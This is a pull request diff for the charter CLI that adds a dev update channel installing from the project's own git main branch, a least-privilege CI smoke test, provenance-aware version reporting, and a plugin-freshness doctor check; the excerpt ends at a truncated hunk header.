### PR TITLE
A dev release channel that publishes nothing, and two plugin-freshness fixes

### DIFF
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -3,6 +3,14 @@ on:
   push:
   pull_request:
   workflow_dispatch:      # lets CI be re-triggered without a noise commit
+
+# Least privilege, declared rather than inherited. Without this key a workflow gets the
+# repository's default token permissions, which on many repositories is write across the
+# board — for jobs whose whole purpose is to run the repository's own code. Neither job
+# below needs more than read, and NEITHER needs `id-token`: see `dev-install`'s own note.
+permissions:
+  contents: read
+
 jobs:
   test:
     runs-on: ubuntu-latest
@@ -16,3 +24,64 @@ jobs:
           python-version: ${{ matrix.python-version }}
       - name: Run the suite
         run: python -m unittest discover -s tests -v
+
+  dev-install:
+    name: A dev-channel install from main actually installs
+    # Push to main only. On a pull request the branch does not exist under that name yet,
+    # so the install below would be testing whatever main already says — a green tick for
+    # code this run never saw.
+    if: github.event_name == 'push' && github.ref == 'refs/heads/main'
+    runs-on: ubuntu-latest
+    # This job is the whole value of "publish on every commit", without publishing
+    # anything. Dev builds are never published: PyPI forbids local version identifiers, so
+    # real dev releases would burn 0.52.0.dev1, .dev2, … permanently and irreversibly at a
+    # rate of hundreds a month; and running the release workflow on every push to main
+    # would multiply exactly the `id-token: write`-with-unpinned-third-party-actions
+    # exposure #443 is open about.
+    #
+    # So it holds NO id-token, writes nothing, and uses only first-party actions. `uv` is
+    # installed with pip rather than through a setup action for that same reason: the
+    # point of the job is undermined if verifying it adds a third-party action to the
+    # push-to-main path.
+    #
+    # It deliberately does not `needs: test`. This is a post-merge smoke test of a
+    # published-as-git artifact, and making it wait on a four-version matrix costs minutes
+    # to tell you nothing the matrix has not already told you.
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/setup-python@v5
+        with:
+          python-version: "3.12"
+      # No checkout: the point is to install the way a user does — from the git URL — and
+      # nothing in this job reads the repository from disk. `@main` rather than
+      # `@${{ github.sha }}` because `@main` is the string `charter update` actually runs
+      # and `docs/install.md` actually prints; a later push landing between the two is a
+      # smoke test running against a slightly newer main, which is harmless.
+      - name: Install uv
+        run: python -m pip install --quiet uv
+      - name: Install charter from main, exactly as the dev channel does
+        run: uv tool install --force git+https://github.com/diazoxide/charter@main
+      - name: The installed charter runs, and knows it is a dev build
+        run: |
+          set -euo pipefail
+          # `uv tool install` puts the console script in ~/.local/bin, which is not on the
+          # runner's PATH by default. `uv tool run` would resolve a fresh environment
+          # rather than the one just installed, which is not the thing under test.
+          charter="$HOME/.local/bin/charter"
+          said=$("$charter" --version)
+          echo "$said"
+          case "$said" in
+            *"+dev"*) ;;
+            *) echo "::error::a git install must report a PEP 610 dev build, got: $said"
+               exit 1 ;;
+          esac
+      - name: And it is a working CLI, not merely an importable package
+        run: |
+          set -euo pipefail
+          charter="$HOME/.local/bin/charter"
+          "$charter" --help > /dev/null
+          # `doctor` runs every check. Outside a control plane it has no plane to inspect,
+          # which is exactly the state a fresh install is in — so this asserts that it
+          # comes up and completes, not what it finds.
+          "$charter" doctor || true

--- a/charter/channel.py
+++ b/charter/channel.py
@@ -1,0 +1,203 @@
+"""Which charter this plane tracks, and which charter is actually installed.
+
+Two questions that look like one and are not, which is why they live side by side here
+rather than being folded into each other:
+
+* **The channel** — ``[update] channel`` in the plane's ``charter.toml``. What the
+  operator asked for. Read through :mod:`charter.instance` at the config boundary, where
+  it is matched against a closed set (see ``instance.UPDATE_CHANNELS``).
+* **The build** — what this interpreter is running, read from the dist-info PEP 610
+  ``direct_url.json``. What is on the machine.
+
+They disagree routinely and legitimately: the moment a plane opts into ``dev`` its channel
+says dev and its build is still the PyPI wheel, right up until ``charter update`` runs.
+Every caller here wants exactly one of the two, and conflating them is how a status line
+would claim a dev build that nobody installed.
+
+**Dev builds are never published.** PyPI forbids local version identifiers, so a real dev
+release would have to burn ``0.52.0.dev1``, ``.dev2``, … permanently, at a rate of hundreds
+a month and irreversibly; and running the release workflow on every push to ``main`` would
+multiply exactly the ``id-token: write``-with-unpinned-actions exposure #443 is open about.
+So a dev build is installed straight from git and identified from the install record git
+left behind, not from a version number that would have to have been published to exist.
+
+Nothing in this module makes a network call or spawns anything. It is read by the status
+line's render path, which renders every turn.
+"""
+
+from __future__ import annotations
+
+import json
+
+from . import __version__
+
+#: Sentinel for "the dist-info has not been read in this process yet". ``None`` is a real
+#: answer here (a PyPI install has no ``direct_url.json``, and neither does a source
+#: checkout), so it cannot double as "not looked".
+_UNREAD = object()
+
+#: Memoised per process. This is read on the status line's render path, where a dist-info
+#: stat per turn is a cost for an answer that cannot change: an install replaces the
+#: interpreter's own package, so a running process is the build it started as.
+_direct_url: object | dict | None = _UNREAD
+
+
+def channel() -> str:
+    """This plane's update channel — ``"stable"`` or ``"dev"``, never anything else.
+
+    Read off ``config.UPDATE``, which `instance.update_of` has already clamped to
+    `instance.UPDATE_CHANNELS`. Callers COMPARE this value and never interpolate it; see
+    that constant's own docstring for why the difference is load-bearing.
+
+    Falls back to ``"stable"`` if `config` cannot answer at all — a plane with no
+    ``charter.toml``, or one whose parse failed and left `config.CONFIG_ERROR` set.
+    """
+    from . import config
+    got = getattr(config, "UPDATE", None)
+    if isinstance(got, dict):
+        value = got.get("channel")
+        # Re-matched rather than trusted, because `config.UPDATE` is a module attribute a
+        # test (or anything else in-process) can assign. The closed set is the guarantee;
+        # a second read of it costs a tuple scan of length two.
+        from . import instance
+        for known in instance.UPDATE_CHANNELS:
+            if value == known:
+                return known
+    return "stable"
+
+
+def is_dev() -> bool:
+    """True when this plane asked for the dev channel. About the PLANE, not the build."""
+    return channel() == "dev"
+
+
+def direct_url() -> dict | None:
+    """The PEP 610 ``direct_url.json`` this install recorded, or ``None``.
+
+    PEP 610 is the whole mechanism, and it is a standard rather than a uv detail: an
+    installer that resolves a requirement from a *direct URL* — a git ref, a local
+    directory, a wheel path — writes this file into the dist-info recording where from; an
+    installer that resolved it from an index writes no such file at all. So its ABSENCE is
+    the positive statement "this came from PyPI", which is what makes it usable as a
+    channel identity without charter having to stamp anything at build time.
+
+    Every failure is ``None`` and none of them raise, because the caller of last resort is
+    ``charter --version``, which must always print something. The list is not defensive
+    padding — each entry is a state that happens:
+
+    * no dist-info at all — running ``python3 -m charter`` from a checkout, which is what
+      CONTRIBUTING.md tells contributors to do;
+    * a dist-info with no ``direct_url.json`` — every PyPI install, the common case;
+    * unreadable or non-JSON content — a half-written or hand-edited dist-info;
+    * JSON that is not an object — same, one level in.
+    """
+    global _direct_url
+    if _direct_url is _UNREAD:
+        _direct_url = _read_direct_url()
+    return _direct_url if isinstance(_direct_url, dict) else None
+
+
+def _read_direct_url() -> dict | None:
+    """The uncached read. Split out so a test can exercise it without the memo, and so the
+    memo has exactly one writer."""
+    try:
+        from importlib.metadata import Distribution
+
+        # `update.DIST` rather than a second literal: the *package* is `charter-cp` and
+        # the *command* is `charter`, and two copies of that fact would be one copy too
+        # many. Imported inside the function because `update` imports this module back —
+        # for `newer_than`'s dev branch — and a module-level pair would be a cycle.
+        from .update import DIST
+        raw = Distribution.from_name(DIST).read_text("direct_url.json")
+    except Exception:
+        # `PackageNotFoundError` is the expected one; the bare catch covers a broken or
+        # partially-written dist-info, which raises from inside importlib rather than as
+        # something this module could name.
+        return None
+    if not raw:
+        return None
+    try:
+        doc = json.loads(raw)
+    except (ValueError, TypeError):
+        return None
+    return doc if isinstance(doc, dict) else None
+
+
+def _vcs_info() -> dict | None:
+    """The ``vcs_info`` block of a **git** direct URL, or ``None`` for anything else.
+
+    ``None`` covers three different installs and deliberately does not distinguish them
+    here — the callers do. A PyPI install (no direct URL), a directory install
+    (``dir_info``, which `build_label` reports as ``+local``), and a non-git VCS install
+    (``hg``, ``svn`` — PEP 610 allows them) all answer the same question the same way:
+    there is no git commit to compare ``main`` against.
+    """
+    doc = direct_url()
+    if not doc:
+        return None
+    info = doc.get("vcs_info")
+    if not isinstance(info, dict) or info.get("vcs") != "git":
+        return None
+    return info
+
+
+def installed_commit() -> str | None:
+    """The exact commit this build was installed from, or ``None`` if it was not a git
+    install.
+
+    This is the left-hand side of the dev channel's "is there anything newer?" — see
+    `update.newer_than`, which compares it against ``main``'s head. ``None`` there means
+    *behind by definition*: a plane that asked for dev and is running something that did
+    not come from git has not got what it asked for.
+    """
+    info = _vcs_info()
+    commit = (info or {}).get("commit_id")
+    return commit.strip() or None if isinstance(commit, str) else None
+
+
+def installed_ref() -> str | None:
+    """The ref that was asked for — ``main`` for the shipped dev install — or ``None``.
+
+    ``requested_revision`` is optional in PEP 610: ``pip install git+…`` with no ``@ref``
+    records the commit and no revision at all. `build_label` drops the ref from its output
+    in that case rather than inventing ``main``, which would be a guess printed as a fact.
+    """
+    info = _vcs_info()
+    ref = (info or {}).get("requested_revision")
+    return ref.strip() or None if isinstance(ref, str) else None
+
+
+def build_label() -> str:
+    """This build's identity, as ``charter --version`` prints it.
+
+    ``0.51.0`` from PyPI, ``0.51.0+dev (main @ abc1234)`` from git, and something honest
+    for each way that can degrade. The version number itself is unchanged in every case —
+    it is the same wheel contents — so the suffix is additive and a stable install's
+    output is byte-identical to what it printed before this existed. That is not cosmetic:
+    `commands_update._handoff` verifies an install by comparing ``charter --version``'s
+    last word to the version it asked for, and the stable path still hands it one word.
+    """
+    doc = direct_url()
+    if not doc:
+        return __version__
+    if _vcs_info() is None:
+        # A direct URL that is not a git install: ``uv tool install .`` from a checkout,
+        # a wheel installed by path, an editable install. Not from PyPI, so saying plain
+        # `0.51.0` would claim a provenance this build does not have — but there is no
+        # commit to name either.
+        return f"{__version__}+local"
+    commit = installed_commit()
+    ref = installed_ref()
+    if not commit:
+        # `vcs_info` without a `commit_id` is malformed — PEP 610 requires it — but a
+        # malformed record still tells us it was a VCS install, which is the part that
+        # decides the channel.
+        return f"{__version__}+dev"
+    short = commit[:7]
+    return f"{__version__}+dev ({ref} @ {short})" if ref else f"{__version__}+dev ({short})"
+
+
+def _reset_cache_for_tests() -> None:
+    """Drop the memo. Named for what it is so it cannot be mistaken for API."""
+    global _direct_url
+    _direct_url = _UNREAD

--- a/charter/cli.py
+++ b/charter/cli.py
@@ -8,7 +8,6 @@ import sys
 
 from . import (
     commands_update,
-    __version__,
     commands,
     commands_frame,
     commands_harness,
@@ -28,6 +27,36 @@ from .browser import PINNED as _PLAYWRIGHT_PIN
 from .forge.registry import KINDS as _FORGE_KINDS
 from .frame import panel as frame_panel
 from .secrets.registry import PROVIDERS
+
+
+class _VersionAction(argparse.Action):
+    """``--version``, resolved when it is asked for rather than when the parser is built.
+
+    argparse's own ``action="version"`` takes a finished string at ``add_argument`` time,
+    and this one is not free: `charter.channel.build_label` reads the dist-info to find
+    out whether this is a dev build (PEP 610), and `build_parser` runs on **every** charter
+    invocation — every hook, every status line render, several per turn. A lazy action
+    moves that read onto the one path that wants it and off the several hundred that do
+    not.
+
+    Prints to stdout and exits 0, which is what the builtin does and what
+    `commands_update._handoff` reads: it runs the newly installed `charter --version` and
+    compares the last word to the version it asked for. A stable install still prints one
+    word, so that comparison is untouched (see `channel.build_label`).
+    """
+
+    def __init__(self, option_strings, dest, **kw):
+        kw.setdefault("nargs", 0)
+        kw.setdefault("default", argparse.SUPPRESS)
+        kw.setdefault("help", "Show this charter's version and, on a dev build, the "
+                              "commit it was installed from.")
+        super().__init__(option_strings, dest, **kw)
+
+    def __call__(self, parser, namespace, values, option_string=None):
+        from . import channel
+
+        print(f"charter {channel.build_label()}")
+        parser.exit()
 
 
 class _NoAbbrev(argparse.ArgumentParser):
@@ -54,7 +83,7 @@ def build_parser() -> argparse.ArgumentParser:
         prog="charter",
         description="charter — discover, clone, and track org repos on demand.",
     )
-    p.add_argument("--version", action="version", version=f"charter {__version__}")
+    p.add_argument("--version", action=_VersionAction)
     sub = p.add_subparsers(dest="command", required=True)
 
     ini = sub.add_parser(

--- a/charter/commands_update.py
+++ b/charter/commands_update.py
@@ -23,7 +23,7 @@ import shutil
 import sys
 from pathlib import Path
 
-from . import config, util
+from . import config, update as _update, util
 from .update import SHARED_INSTALL_NOTE, _parse
 
 #: The distribution, and the install commands that actually move it.
@@ -36,6 +36,33 @@ from .update import SHARED_INSTALL_NOTE, _parse
 _INSTALLERS = {
     "uv": ["uv", "tool", "install", "charter-cp=={version}", "--force", "--refresh"],
     "pipx": ["pipx", "install", "charter-cp=={version}", "--force"],
+}
+
+#: The requirement a dev install resolves — **a module constant, with no interpolation
+#: point in it at all**, and that is the security property this whole feature turns on.
+#:
+#: `charter.toml` is committed and arrives from someone else's machine. It decides WHETHER
+#: charter follows the dev channel (`instance.UPDATE_CHANNELS`, a closed set of two) and it
+#: never decides WHAT charter installs: this string is written here, joined from
+#: `update.DEV_REPO` and `update.DEV_BRANCH` which are also constants, and it reaches
+#: `util.run` as one element of a list argv — no shell, no format call, no value read from
+#: anywhere. The two incidents behind that rule are named in `instance.UPDATE_CHANNELS`.
+#:
+#: The literal spelling, so it can be typed by hand and be the same thing:
+#: ``uv tool install --force git+https://github.com/diazoxide/charter@main``.
+DEV_SPEC = f"git+https://github.com/{_update.DEV_REPO}@{_update.DEV_BRANCH}"
+
+#: The dev half of :data:`_INSTALLERS`, keyed the same way and moved by the same
+#: `installer_for` lookup.
+#:
+#: No ``--refresh``, unlike the pinned installers above: that flag exists to defeat a
+#: *PyPI index cache* that lags the metadata endpoint, and there is no index in this path —
+#: uv resolves a git ref and clones it. ``--force`` is what makes the install replace the
+#: charter already there, which for a spec whose resolved commit changes under a fixed name
+#: is the whole job.
+_DEV_INSTALLERS = {
+    "uv": ["uv", "tool", "install", "--force", DEV_SPEC],
+    "pipx": ["pipx", "install", "--force", DEV_SPEC],
 }
 
 #: How an install identifies its owner. Path-shaped rather than "which binary exists",
@@ -129,6 +156,128 @@ def _sync_to(version: str) -> tuple[bool, str]:
     return True, version
 
 
+def dev_install_argv() -> tuple[str, list[str] | None]:
+    """``(installer name, argv)`` for a dev install — a fresh list of module constants.
+
+    The mirror of :func:`installer_for`, and deliberately a separate function rather than a
+    ``{version}`` substituted into that one: :func:`_sync_to` builds its command with
+    ``a.format(version=…)``, and a dev spec run through the same line would put a
+    ``str.format`` call between a committed config file and an install command. There is no
+    format call on this path, so there is nothing to reach through.
+
+    A fresh list per call, never the table's own: the caller hands it to `util.run`, and a
+    module-level list handed out is a module-level list something can edit for the life of
+    the process (same reason `instance.density_slots` copies).
+    """
+    name, _pypi = installer_for(Path(sys.executable))
+    argv = _DEV_INSTALLERS.get(name)
+    return name, (list(argv) if argv else None)
+
+
+def _sync_dev() -> tuple[bool, str]:
+    """Install :data:`DEV_SPEC` through whichever tool owns this install."""
+    name, argv = dev_install_argv()
+    if argv is None:
+        return False, (f"charter was not installed by uv or pipx, so charter will not "
+                       f"guess how to move it — run the equivalent of: "
+                       f"uv tool install --force {DEV_SPEC}")
+    if not shutil.which(argv[0]):
+        return False, f"{name} owns this install but is not on PATH"
+    proc = util.run(argv, check=False)
+    if proc.returncode != 0:
+        why = (proc.stderr or proc.stdout or "").strip().splitlines()
+        return False, (why[-1][:200] if why else f"exit {proc.returncode}")
+    return True, DEV_SPEC
+
+
+def _handoff_dev(baseline: str) -> tuple[bool, str]:
+    """The dev channel's :func:`_handoff`: verify the install took, then run the news phase.
+
+    The stable path proves an install by comparing ``charter --version``'s last word to the
+    version it asked for. A dev install cannot use that test — the version number does not
+    move, which is the entire reason dev builds are not published — so the proof is the
+    thing that DOES change: the new binary reports a PEP 610 dev build. A ``charter
+    --version`` still saying plain ``0.51.0`` means the PyPI wheel is still installed and
+    ``uv`` exited 0 against something else.
+
+    The news phase runs on the same terms and for the same reason (`_handoff`'s docstring
+    owns the loop story, including why `news._ENV` and not arithmetic is what bounds it).
+    Its range is empty here, because dev does not move the version — kept anyway rather
+    than special-cased away, so a dev build installed over an older CLI still reports what
+    the versions in between brought.
+    """
+    binary = shutil.which("charter")
+    if not binary:
+        return False, "the `charter` command is not on PATH from here"
+    got = util.run([binary, "--version"], check=False)
+    said = (got.stdout or got.stderr or "").strip()
+    if got.returncode != 0 or "+dev" not in said:
+        return False, (f"the installed `charter` reports {said or '?'}, which is not a dev "
+                       f"build — the install did not replace what is on PATH")
+    news = util.run([binary, "news", "--since", baseline], check=False)
+    out = (news.stdout or "").strip()
+    if out:
+        print(out)
+    return True, said
+
+
+def _move_harness() -> None:
+    """Move this harness's charter artifact, and say what happened. Never raises.
+
+    Shared by both channels because it is the same job on both: the artifact tracks the
+    CLI, and which channel the CLI came from is not something it has an opinion about.
+    Extracted when the dev path was added rather than copied — two copies of a block that
+    ends in `stale_wiring()` is two places for a status branch to be forgotten.
+    """
+    from . import harness
+
+    h = harness.get(harness.current())
+    if h is None:
+        # Never "nothing to do": absence of information is not evidence of health, and a
+        # terminal-run update is the likeliest place for that to mislead.
+        util.warn("no harness detected, so its charter artifact was not checked — "
+                  "`charter harness list`.")
+        return
+    status, detail = h.upgrade(config.ROOT)
+    if status == "moved":
+        util.ok(f"moved: {detail}")
+    elif status == "current":
+        util.ok(f"the {h.name} artifact is already on {detail}.")
+    elif status == "manual":
+        util.info(f"the {h.name} artifact is the host's to move:")
+        util.info(f"  run: {detail}")
+    else:
+        util.warn(detail)
+    stale = h.stale_wiring()
+    if stale:
+        util.warn(f"this plane's {h.name} wiring was written by {stale} — "
+                  f"`charter reinit` adds what is missing.")
+
+
+def _refresh_plugin() -> None:
+    """Force the Claude Code plugin back into step with the marketplace clone.
+
+    **Only on the dev channel, and only because a version-keyed update cannot do it.**
+    `claude plugin update charter@charter` compares version strings; charter's plugin
+    version moves once per release; so between releases it correctly answers *already at
+    the latest version* while the clone it came from has moved on. `plugincache` owns the
+    mechanism and the evidence.
+
+    Best-effort and loud about failing, never fatal: charter's CLI has just been replaced
+    successfully at this point, and a plugin that could not be refreshed is a smaller
+    problem than an update that reports failure over one.
+    """
+    from . import plugincache
+
+    if not plugincache.available():
+        return          # no Claude Code here — opencode and Codex have no plugin cache
+    ok, detail = plugincache.force_refresh(config.ROOT)
+    if ok:
+        util.ok(f"plugin: {detail} — it loads on the NEXT session.")
+    else:
+        util.warn(f"the plugin was not refreshed: {detail}")
+
+
 def _handoff(target: str, baseline: str) -> tuple[bool, str]:
     """Run the news phase in a fresh process of the NEWLY INSTALLED binary.
 
@@ -207,8 +356,61 @@ def _resolve_target(args, installed: str, locked: str | None) -> tuple[str | Non
     return installed, False, latest
 
 
+def _update_dev(args, installed: str) -> int:
+    """`charter update` on the dev channel: install from git, then the two artifacts.
+
+    The same command with the same shape as the stable path — CLI, then this harness's
+    artifact, then verification — with three differences, each forced by what a dev build
+    is rather than chosen:
+
+    * **No target resolution.** There is nothing published to resolve against; the target
+      is ``main``, which is what :data:`DEV_SPEC` says and all it says.
+    * **The plugin is force-refreshed.** On stable, `claude plugin update` handles it at
+      release time. On dev the version never moves, so a version-keyed update is a no-op
+      by construction and the only mechanism left is uninstall + reinstall. See
+      `_refresh_plugin`.
+    * **No pin.** ``[charter] version`` is a published version a team conforms to; a commit
+      of ``main`` is not one, and writing one into a committed file would put every
+      teammate onto an unreviewed merge. ``--bump`` says so rather than doing nothing.
+
+    **Nothing here installs by itself.** The status line nudges when ``main`` moves and the
+    operator types this command — auto-installing unreviewed merges is committed content
+    reaching execution without a moment of consent, which is the shape of #453.
+    """
+    from . import channel
+
+    # BEFORE anything moves, so an interrupted update still knows where it started.
+    _stamp_baseline(installed)
+    before = channel.installed_commit()
+
+    util.warn(SHARED_INSTALL_NOTE)
+    util.info(f"installing charter from {DEV_SPEC} …")
+    ok, detail = _sync_dev()
+    if not ok:
+        util.err(f"could not install the dev build: {detail}")
+        return 1
+
+    _move_harness()
+    _refresh_plugin()
+
+    ok, said = _handoff_dev(installed)
+    if not ok:
+        util.err(f"the install did not take: {said}")
+        util.info("  nothing was reported about the new build, because charter could not "
+                  "confirm it is the one running.")
+        return 1
+    util.ok(f"on the dev channel: {said}")
+    if before and before[:7] in said:
+        util.info("  same commit as before — main had not moved.")
+    if getattr(args, "bump", False):
+        util.warn("--bump moves this plane's `[charter] version` pin, which names a "
+                  "PUBLISHED release. A dev build has no such number, so the pin was left "
+                  "alone.")
+    return 0
+
+
 def cmd_update(args) -> int:
-    from . import doctor, harness, instance, news
+    from . import channel, doctor, instance, news
 
     if news.probing():
         # FIRST, before the checkout refusal below and before anything is read, because
@@ -235,6 +437,18 @@ def cmd_update(args) -> int:
         return 2
 
     installed = _installed_version()
+    explicit = (getattr(args, "to", None) or "").strip()
+    if channel.is_dev() and not explicit:
+        return _update_dev(args, installed)
+    if channel.is_dev():
+        # `--to X.Y.Z` names a PUBLISHED version, which is the one thing the dev channel
+        # does not have. Rather than refuse it, honour it and say what just happened: this
+        # is how somebody goes back to a release without first editing charter.toml, and
+        # an update that silently installed `main` because the plane said so would be
+        # ignoring the version the operator typed on the line in front of them.
+        util.info(f"this plane tracks the dev channel; --to {explicit} overrides it for "
+                  f"this run and installs the published release.")
+
     locked = instance.locked_version(instance.load(config.ROOT))
     target, proposed, latest = _resolve_target(args, installed, locked)
     if proposed:
@@ -258,27 +472,7 @@ def cmd_update(args) -> int:
             util.err(f"could not install {target}: {detail}")
             return 1
 
-    h = harness.get(harness.current())
-    if h is None:
-        # Never "nothing to do": absence of information is not evidence of health, and a
-        # terminal-run update is the likeliest place for that to mislead.
-        util.warn("no harness detected, so its charter artifact was not checked — "
-                  "`charter harness list`.")
-    else:
-        status, detail = h.upgrade(config.ROOT)
-        if status == "moved":
-            util.ok(f"moved: {detail}")
-        elif status == "current":
-            util.ok(f"the {h.name} artifact is already on {detail}.")
-        elif status == "manual":
-            util.info(f"the {h.name} artifact is the host's to move:")
-            util.info(f"  run: {detail}")
-        else:
-            util.warn(detail)
-        stale = h.stale_wiring()
-        if stale:
-            util.warn(f"this plane's {h.name} wiring was written by {stale} — "
-                      f"`charter reinit` adds what is missing.")
+    _move_harness()
 
     ok, why = _handoff(target, installed)
     if not ok:

--- a/charter/commands_update.py
+++ b/charter/commands_update.py
@@ -271,7 +271,16 @@ def _refresh_plugin() -> None:
 
     if not plugincache.available():
         return          # no Claude Code here — opencode and Codex have no plugin cache
-    ok, detail = plugincache.force_refresh(config.ROOT)
+    try:
+        ok, detail = plugincache.force_refresh(config.ROOT)
+    except Exception as e:
+        # "Never fatal" has to be enforced, not asserted. `force_refresh` returns rather
+        # than raises on every path it owns; this keeps the promise true for the ones it
+        # does not — and the promise matters more here than anywhere else, because by this
+        # line the CLI has already been replaced and the harness artifact already moved.
+        # An exception escaping would end a SUCCESSFUL update in a traceback.
+        util.warn(f"the plugin was not refreshed: {e}")
+        return
     if ok:
         util.ok(f"plugin: {detail} — it loads on the NEXT session.")
     else:

--- a/charter/config.py
+++ b/charter/config.py
@@ -256,6 +256,11 @@ def derive(root: Path, start: Path | None = None) -> dict:
     #: `instance.FRAME_DEFAULTS`; an absent or malformed section yields them whole.
     d["FRAME"] = _instance.frame_of(cfg)
 
+    #: Which charter this plane tracks — see `charter.instance.UPDATE_CHANNELS` and
+    #: `charter.channel`. ``{"channel": "stable"}`` unless the plane opts in, and a value
+    #: charter does not recognise degrades to exactly that.
+    d["UPDATE"] = _instance.update_of(cfg)
+
     #: Root for worktrees, or ``None`` for the per-workspace ``.worktrees/`` default.
     d["WORKTREES_ROOT"] = worktrees_root_for(root, cfg)
 

--- a/charter/doctor.py
+++ b/charter/doctor.py
@@ -1962,13 +1962,35 @@ def check_plugin_freshness() -> Result:
     the SessionStart preflight print; a plugin whose skills are a week old is not a reason
     to shout at every session start on every plane.
     """
+    name = "plugin files"
+    try:
+        return _plugin_freshness(name)
+    except Exception as e:
+        # The row-level guard every network-touching check here already has, for the
+        # reason `doctor._checks()` makes unavoidable: it is an eager list literal with no
+        # per-check guard, so one raising check returns NO rows at all — and
+        # `hooks/hooks.json` renders a non-zero `charter doctor` as "charter preflight
+        # failed - fix before working:" at every SessionStart. `plugincache` returns
+        # rather than raises on every path it owns; this is the belt for the paths it
+        # does not.
+        return Result(name, WARN, detail=f"not checked ({e})", hint=_NOT_CHECKED_HINT)
+
+
+def _plugin_freshness(name: str) -> Result:
+    """The body of :func:`check_plugin_freshness`, which owns the story and the guard."""
     from . import channel, config as _config, plugincache
 
-    name = "plugin files"
     dev = channel.is_dev()
     if not plugincache.available():
         return Result(name, OK, detail="no `claude` on PATH — no Claude Code plugin here")
     entry = plugincache.installed_charter_plugin(_config.ROOT)
+    if entry is plugincache.UNKNOWN:
+        # NOT the green "not installed" below. An older `claude` that does not understand
+        # `--json` answers here, and that is the population most likely to be running a
+        # stale plugin — reporting a tick over it is the #171 defect exactly.
+        return Result(name, WARN,
+                      detail="not checked (could not read `claude plugin list --json`)",
+                      hint=_NOT_CHECKED_HINT)
     if entry is None:
         return Result(name, OK, detail="the charter plugin is not installed here")
     install_path = entry.get("installPath")

--- a/charter/doctor.py
+++ b/charter/doctor.py
@@ -1932,6 +1932,75 @@ def check_plugin_skew() -> Result:
                          f"plugin, dispatching every handler. Upgrade: {upgrade}")
 
 
+def check_plugin_freshness() -> Result:
+    """Is the INSTALLED plugin the same FILES as the marketplace clone it came from?
+
+    `check_plugin_skew` above compares version numbers, and between releases that number is
+    frozen by design — so it reports agreement it has not checked. Measured on one machine
+    while this was written: installed cache and marketplace clone both saying ``0.51.0``,
+    45 files apart, ``skills/secrets/SKILL.md`` and ``skills/browser/SKILL.md`` among them,
+    and `claude plugin update charter@charter` correctly answering *already at the latest
+    version*. Hooks are unaffected — they invoke the ``charter`` on ``PATH`` — but skills
+    are text the model loads, so a stale one is wrong instructions delivered confidently.
+
+    **The severity is different on the two channels, and that is not hedging.** The
+    marketplace clone tracks ``main``, which Claude Code re-fetches on its own, so *some*
+    drift is the steady state for every stable plane from the day after a release onward.
+    Warning about it would put a permanent yellow row in front of everyone whose only
+    honest fix is "wait for the next release" — the cry-wolf failure this module's
+    comments keep returning to, and the one that costs the rows that matter. So:
+
+    * **dev channel** — WARN. The plane asked to track ``main`` and its plugin is not; that
+      is a gap between what was declared and what is installed, with a command that closes
+      it.
+    * **stable channel** — OK, with the drift and the command named in ``detail``. Not
+      ``hint``: `Result.render` drops the hint entirely at OK, so guidance written there
+      would be invisible while looking shipped. The row still says the true thing, which is
+      the live gap — today nothing anywhere does.
+
+    Never FAIL. `cmd_doctor` exits non-zero only on FAIL, and that exit code is what makes
+    the SessionStart preflight print; a plugin whose skills are a week old is not a reason
+    to shout at every session start on every plane.
+    """
+    from . import channel, config as _config, plugincache
+
+    name = "plugin files"
+    dev = channel.is_dev()
+    if not plugincache.available():
+        return Result(name, OK, detail="no `claude` on PATH — no Claude Code plugin here")
+    entry = plugincache.installed_charter_plugin(_config.ROOT)
+    if entry is None:
+        return Result(name, OK, detail="the charter plugin is not installed here")
+    install_path = entry.get("installPath")
+    clone = plugincache.marketplace_clone(entry["id"].split("@", 1)[1])
+    if not isinstance(install_path, str) or clone is None:
+        return Result(name, WARN,
+                      detail="not checked (could not locate the install or its marketplace)",
+                      hint=_NOT_CHECKED_HINT)
+    mine = plugincache.content_hash(install_path)
+    theirs = plugincache.content_hash(clone)
+    if mine is None or theirs is None:
+        return Result(name, WARN, detail="not checked (the plugin surface is unreadable)",
+                      hint=_NOT_CHECKED_HINT)
+    if mine == theirs:
+        return Result(name, OK, detail=f"matches the marketplace clone ({mine[:7]})")
+    shown = plugincache.differing(install_path, clone)
+    which = ", ".join(shown) + (" …" if len(shown) >= 3 else "")
+    fix = "charter update" if dev else (
+        f"`charter update` on the dev channel refreshes it; on stable the released "
+        f"plugin is what pairs with the released CLI, so the fix is the next release")
+    if dev:
+        return Result(name, WARN,
+                      detail=f"installed {mine[:7]}, marketplace {theirs[:7]} — {which}",
+                      hint=f"this plane tracks the dev channel and its plugin does not. "
+                           f"A version-keyed `claude plugin update` cannot see this, "
+                           f"because both sides say v{entry.get('version')}. Run: {fix}")
+    return Result(name, OK,
+                  detail=f"installed {mine[:7]}, marketplace {theirs[:7]} — {which}. "
+                         f"Both say v{entry.get('version')}, so `claude plugin update` "
+                         f"reports nothing to do; {fix}")
+
+
 #: Launcher basenames charter itself removed, so it can name the replacement instead of
 #: merely reporting the absence. `bin/edm` and its `bin/charter` forwarding shim went with
 #: the rename; a `charter` on PATH is what took over from both.
@@ -2195,7 +2264,7 @@ def _checks():
                 check_ask_rules(),
                 check_shadowed_knowledge(),
                 check_credential_paths(),
-                check_mcp_launchers(), check_plugin_skew()]
+                check_mcp_launchers(), check_plugin_skew(), check_plugin_freshness()]
     return results
 
 

--- a/charter/hooks.py
+++ b/charter/hooks.py
@@ -1952,10 +1952,25 @@ def _autosync_version_lock() -> str | None:
     to prevent.
     """
     try:
-        from . import __version__, commands, config, instance as _instance
+        from . import __version__, channel, commands, config, instance as _instance
         locked = _instance.locked_version(_instance.load(config.ROOT))
         if not locked or locked == __version__:
             return None
+        if channel.is_dev():
+            # A pin and the dev channel ask for two different charters, and this site is
+            # the one that would silently settle it — every session, in favour of the pin,
+            # by installing the PyPI wheel over a git build. Nothing would say so either:
+            # a dev build carries the SAME version number, so the equality above never
+            # catches it and the plane is quietly returned to stable at every session
+            # start after its one `charter update`.
+            #
+            # Reported, not resolved, for the reason this docstring already gives twice
+            # over: the choice replaces the binary that enforces the credential guard, and
+            # session start has nobody to ask.
+            return (f"⬢ charter: this control plane pins {locked} AND declares `[update] "
+                    f"channel = \"dev\"`. Those ask for two different charters, so nothing "
+                    f"was installed. Working on {__version__}; drop one of the two from "
+                    f"the plane's `charter.toml`.")
         if not _instance.version_ok(locked):
             return (f"⬢ charter: this control plane's `[charter] version` is not a "
                     f"version, so nothing was installed. "

--- a/charter/instance.py
+++ b/charter/instance.py
@@ -579,3 +579,64 @@ def frame_of(cfg: dict) -> dict:
